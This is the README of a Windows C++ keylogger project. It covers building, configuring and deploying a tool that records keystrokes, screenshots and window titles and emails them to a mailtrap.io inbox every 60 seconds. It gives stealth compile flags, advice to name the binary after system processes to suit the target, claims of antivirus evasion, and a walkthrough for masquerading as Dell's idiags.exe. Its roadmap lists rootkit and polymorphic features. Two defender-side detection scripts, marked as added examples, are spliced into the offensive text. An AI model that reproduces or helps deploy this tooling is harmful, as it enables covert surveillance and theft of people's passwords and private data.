This is a Windows-based keylogger implementation in C++ that captures keyboard input, screenshots and active window titles, and periodically sends reports via email. It uses the Windows Hook API for keystroke capture and libcurl for email delivery.
| Feature | basic_implementation_email.cpp | window_screenshot_implementation.cpp |
|---|---|---|
| Keystroke Logging | ✅ Basic | ✅ Advanced with context |
| Email Reporting | ✅ Text only | ✅ Text + Screenshots |
| Screenshot Capture | ❌ | ✅ |
| Window Title Tracking | ❌ | ✅ |
| System Resource Usage | 🟢 Minimal | 🟡 Moderate |
| Build Complexity | 🟢 Simple | 🟡 Requires additional libraries |
| Stealth Level | 🟢 High | 🟡 Moderate (due to screenshots) |
This implementation has been tested against major antivirus solutions and remains undetected. Below are the scan results from multiple antivirus scanners:
- Windows operating system (Windows 7 or later)
- C++ compiler (MinGW-w64 or Visual Studio)

  Installing MinGW-w64:

  ```bash
  # Using winget (Windows Package Manager)
  winget install mingw
  ```

  After installation, add MinGW-w64 to PATH:

  ```bash
  setx PATH "%PATH%;C:\mingw64\bin"
  ```

  Alternatively, manual installation:

  - Download the installer from the MinGW-w64 website
  - During installation, select:
    - Architecture: x86_64
    - Threads: win32
    - Exception: seh
  - Add the MinGW-w64 bin directory to the system PATH
- libcurl development libraries

  Using vcpkg:

  ```bash
  # Clone vcpkg
  git clone https://github.com/Microsoft/vcpkg.git
  cd vcpkg
  # Bootstrap vcpkg
  .\bootstrap-vcpkg.bat
  # Add to PATH
  setx PATH "%PATH%;%CD%"
  ```

  Install libcurl:

  ```bash
  # Using vcpkg
  vcpkg install curl:x64-windows
  ```

- Windows SDK (included with Visual Studio, or install separately):

  ```bash
  # Using winget
  winget install Microsoft.WindowsSDK
  ```
- Create a temporary mailbox before following steps 2 or 3; scroll down to the section "Create Temporary Email Using temp-mail.org"
- Compile basic_implementation_email.cpp using MinGW-w64:

  ```bash
  # Using MinGW-w64 (recommended for stealth)
  g++ basic_implementation_email.cpp -o iDiags -lcurl -lwinmm -mwindows
  ```

  Note: The name of the compiled executable is 'iDiags.exe'; you need to change the name as per your target. A safe bet would be to name it something like 'win64', 'win32', 'system', 'Network Service', etc.

  ```bash
  # Alternative without hiding console (for debugging)
  g++ basic_implementation_email.cpp -o keylogger -lcurl -lwinmm
  ```

  Note: The `-mwindows` flag prevents the console window from appearing when running the program, making it more stealthy. Remove this flag during development/debugging to see console output.

- Compile window_screenshot_implementation.cpp using MinGW-w64:

  ```bash
  # Using MinGW-w64 (recommended for stealth)
  g++ window_screenshot_implementation.cpp -o win64 -lgdiplus -lcurl -lwinmm -mwindows
  ```

  Note: The name of the compiled executable is 'win64.exe'; you need to change the name as per your target.

  ```bash
  # For debugging (with console)
  g++ window_screenshot_implementation.cpp -o win_service_debug -lgdiplus -lcurl -lwinmm
  ```
- Visit mailtrap.io and click "Sign Up"
- Choose "Sign up with email"; you can use a temporary email from temp-mail.org
- Once logged in, go to "Email Testing" → "Inboxes"
- In your inbox, find the SMTP credentials:
  - Click on "Show Credentials"
  - Use the provided username and password in your configuration
  - Use the SMTP server settings provided
The SMTP settings from mailtrap.io are secure and perfect for testing email functionality without exposing your personal email. If you are paranoid, you can use proxy servers to receive the data (coming soon :)).
Before running, modify these constants in the source code:

```cpp
#define EMAIL_ADDRESS "YOUR_USERNAME"
#define EMAIL_PASSWORD "YOUR_PASSWORD"
#define SEND_REPORT_EVERY 60 // seconds
```
Before running either implementation:
- Email Configuration:
  - Set up a mailtrap.io account as described in the Email Setup section
  - Update EMAIL_ADDRESS and EMAIL_PASSWORD in the source code
  - Configure the SMTP settings according to your mailtrap.io credentials
- Timing Configuration:
  - Adjust the SEND_REPORT_EVERY value (in seconds) based on your needs
  - Default is set to 60 seconds
- Output File Names:
  - Screenshots are saved with timestamp-based names
  - Consider changing the output directory path if needed
- Run the compiled executable (note: the name is 'iDiags.exe' here; it will differ depending on how you compiled the program):

  ```bash
  ./iDiags
  ```

- The program will:
  - Start capturing keystrokes
  - Send email reports every 60 seconds
  - Continue running until terminated
For educational purposes only, it's important to understand how malicious actors might exploit legitimate system processes. Here's an example:
Dell laptops come with Dell Support Assistant, which uses a legitimate process called `idiags.exe`. This process:

- Performs system diagnostics and stress tests
- Utilizes CPU and RAM resources
- Generates network traffic for system analysis
- Is trusted by users due to its official Dell origin

An attacker could exploit this trust by:

- Renaming `basic_implementation_email.cpp` to `idiags.cpp`
- Compiling it as `idiags.exe`
- Placing it in a Dell-related directory
This approach works because:
- The process name appears legitimate in Task Manager
- Resource usage matches expected behavior
- Network traffic seems normal for diagnostics
- Users are familiar with Dell's automated tools
The success of this strategy relies heavily on social engineering principles:
- Exploiting user trust in known brands
- Mimicking legitimate system processes
- Blending in with expected system behavior
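The masquerade above gives a defender a concrete check: a process that borrows a vendor binary's name should still run from the vendor's install directory and carry the vendor's code-signing publisher, so a same-named image elsewhere on disk, or unsigned, stands out. The script below is an added example, not code from this project; the vendor table (directory and publisher strings), the `check_masquerade` and `scan_inventory` names and the sample inventory are all constructed placeholders for illustration.

```python
# Added example (not part of this project): a defender-side check for the
# process-name masquerade described above. It flags a running image that
# borrows a known vendor binary's name but lives outside the vendor's install
# directory or lacks the vendor's code-signing publisher.
from pathlib import PureWindowsPath

# Assumption: a site-maintained table of vendor binaries. The directory and
# publisher strings below are illustrative placeholders, not verified values
# for the real Dell tool.
KNOWN_VENDOR_BINARIES = {
    "idiags.exe": {
        "publishers": {"Dell Inc."},
        "dirs": [r"C:\Program Files\Dell\SupportAssist"],
    },
}


def _is_under(path, directory):
    """Case-insensitive prefix test, since Windows paths are case-insensitive."""
    want = [p.lower() for p in PureWindowsPath(directory).parts]
    have = [p.lower() for p in path.parts[: len(want)]]
    return have == want


def check_masquerade(name, image_path, publisher):
    """Return a list of reasons the process looks like a masquerade, an empty
    list if it matches the vendor profile, or None if the name is not tracked."""
    expected = KNOWN_VENDOR_BINARIES.get(name.lower())
    if expected is None:
        return None
    reasons = []
    path = PureWindowsPath(image_path)
    if not any(_is_under(path, d) for d in expected["dirs"]):
        reasons.append("unexpected location")
    if publisher not in expected["publishers"]:
        reasons.append("unexpected signer")
    return reasons


def scan_inventory(records):
    """records: iterable of (name, image_path, publisher) as a process
    inventory tool would report them. Returns the suspicious entries."""
    flagged = []
    for name, image_path, publisher in records:
        reasons = check_masquerade(name, image_path, publisher)
        if reasons:
            flagged.append((name, image_path, reasons))
    return flagged


# Constructed sample inventory: one entry matching the vendor profile, one
# same-named image in a user-writable directory, one untracked process.
SAMPLE_INVENTORY = [
    ("idiags.exe", r"C:\Program Files\Dell\SupportAssist\idiags.exe", "Dell Inc."),
    ("iDiags.exe", r"C:\Users\bob\AppData\Local\Temp\iDiags.exe", "Unsigned"),
    ("notepad.exe", r"C:\Windows\System32\notepad.exe", "Microsoft Windows"),
]

if __name__ == "__main__":
    for entry in scan_inventory(SAMPLE_INVENTORY):
        print(entry)
```

Feed it the (name, path, publisher) triples from whatever inventory source you already collect; the check is deliberately keyed on location and signer rather than on the name alone, because the name is exactly what this page shows being copied.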
- Keyboard Hook System
  - Uses `SetWindowsHookEx` with the `WH_KEYBOARD_LL` hook type
  - Captures all keyboard events system-wide
  - Processes both standard keys and special keys (F1-F12, modifiers, etc.)
- Data Collection
  - Stores captured keystrokes in memory
  - Formats special keys for readability (e.g., "[ENTER]", "[BACKSPACE]")
  - Uses Windows Virtual-Key codes for key identification
- Email Reporting
  - Implements SMTP using libcurl
  - Sends periodic reports based on a timer
  - Uses mailtrap.io as the SMTP server
  - Clears the local buffer after successful sending

- `hook_proc`: Main keyboard event handler
- `send_email`: Handles email composition and sending
- `TimerProc`: Manages periodic report scheduling
- Process Monitoring
  - Visible in Task Manager
  - Process name and resources visible
  - Hook chain presence
- File System
  - Executable visible on disk
  - File creation timestamp
  - File location and permissions
- Connection Patterns
  - Regular SMTP connections (every 60s)
  - Fixed destination (smtp.mailtrap.io:2525)
  - Consistent data transfer patterns
- Security Monitoring
  - Firewall logs
  - Network traffic analysis
  - SMTP traffic from non-mail applications
- API Monitoring
  - SetWindowsHookEx calls
  - Keyboard event monitoring
  - Regular timer events
- Resource Usage
  - Memory footprint
  - CPU usage patterns
  - Network bandwidth usage

- Antivirus detection
- Behavioral analysis
- Heuristic detection
- Network security monitoring
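The connection-pattern indicators above (SMTP every 60 seconds, one fixed destination, from a process that is not a mail client) translate directly into detection logic over a firewall or endpoint connection log. The script below is an added example, not code from this project; the log format, the `SMTP_PORTS` and `MAIL_CLIENTS` sets, the `find_smtp_beacons` name and the sample log lines are all constructed assumptions.

```python
# Added example (not from this project): detection logic for the connection
# pattern listed above, namely a non-mail process that opens SMTP connections
# to one fixed destination at a near-constant interval. It runs over a
# constructed connection log; the format and the allowlist are assumptions.
from collections import defaultdict
from datetime import datetime
from statistics import median

SMTP_PORTS = {25, 465, 587, 2525}
# Assumption: site allowlist of processes expected to speak SMTP. Keying on
# the image name alone is weak, since the page itself shows the binary being
# renamed; in production, key on the signed image path instead.
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}

# Constructed sample log, one connection per line:
# timestamp,process,dest_host,dest_port
SAMPLE_LOG = """\
2024-01-01T10:00:00,iDiags.exe,smtp.mailtrap.io,2525
2024-01-01T10:00:10,updater.exe,mail.example.net,587
2024-01-01T10:00:30,chrome.exe,example.com,443
2024-01-01T10:00:50,updater.exe,mail.example.net,587
2024-01-01T10:01:00,iDiags.exe,smtp.mailtrap.io,2525
2024-01-01T10:02:00,iDiags.exe,smtp.mailtrap.io,2525
2024-01-01T10:02:15,outlook.exe,smtp.office365.com,587
2024-01-01T10:03:00,iDiags.exe,smtp.mailtrap.io,2525
2024-01-01T10:04:00,iDiags.exe,smtp.mailtrap.io,2525
2024-01-01T10:05:00,updater.exe,mail.example.net,587
2024-01-01T10:05:10,updater.exe,mail.example.net,587
"""


def parse_log(text):
    """Parse the CSV-style log into (timestamp, process, host, port) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, proc, host, port = line.split(",")
        events.append((datetime.fromisoformat(ts), proc.lower(), host, int(port)))
    return events


def find_smtp_beacons(events, min_connections=4, max_jitter=0.2):
    """Return (process, host, port, interval_seconds) for every non-mail
    process that contacted an SMTP port at a near-constant interval.

    A series counts as a beacon when it has at least min_connections hits and
    every gap between consecutive connections is within max_jitter (a fraction)
    of the median gap. Irregular bursts therefore do not match."""
    by_key = defaultdict(list)
    for ts, proc, host, port in events:
        if port in SMTP_PORTS and proc not in MAIL_CLIENTS:
            by_key[(proc, host, port)].append(ts)

    findings = []
    for (proc, host, port), times in by_key.items():
        if len(times) < min_connections:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        med = median(gaps)
        if med > 0 and all(abs(g - med) <= max_jitter * med for g in gaps):
            findings.append((proc, host, port, med))
    return findings


if __name__ == "__main__":
    for proc, host, port, interval in find_smtp_beacons(parse_log(SAMPLE_LOG)):
        print(f"{proc} -> {host}:{port} every {interval:.0f}s")
```

In the sample log only the 60-second series to smtp.mailtrap.io:2525 is reported; the `updater.exe` connections go to an SMTP port too but at irregular gaps, and `outlook.exe` is allowlisted. Raise `max_jitter` if you want to catch senders that add small random delays to the interval.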
- Process Hiding
  - Implement process name randomization
  - Add anti-debugging techniques
  - Develop rootkit capabilities
- Network Stealth
  - Implement traffic encryption
  - Randomize connection intervals
  - Use alternative communication channels
- Data Collection
  - Add screenshot capability
  - Implement clipboard monitoring
  - Add mouse movement tracking
  - Include active window tracking
- Reporting
  - Add data compression
  - Implement encryption
  - Add alternative reporting methods
  - Include system information
- Error Handling
  - Improve network error recovery
  - Add local data persistence
  - Implement backup servers
- Performance
  - Optimize memory usage
  - Reduce CPU footprint
  - Implement efficient storage
- Anti-Detection
  - Add signature randomization
  - Implement polymorphic code
  - Add anti-analysis features
- Data Protection
  - Implement end-to-end encryption
  - Add secure data storage
  - Improve credential handling
This project is for educational purposes only. See the attached license for more details.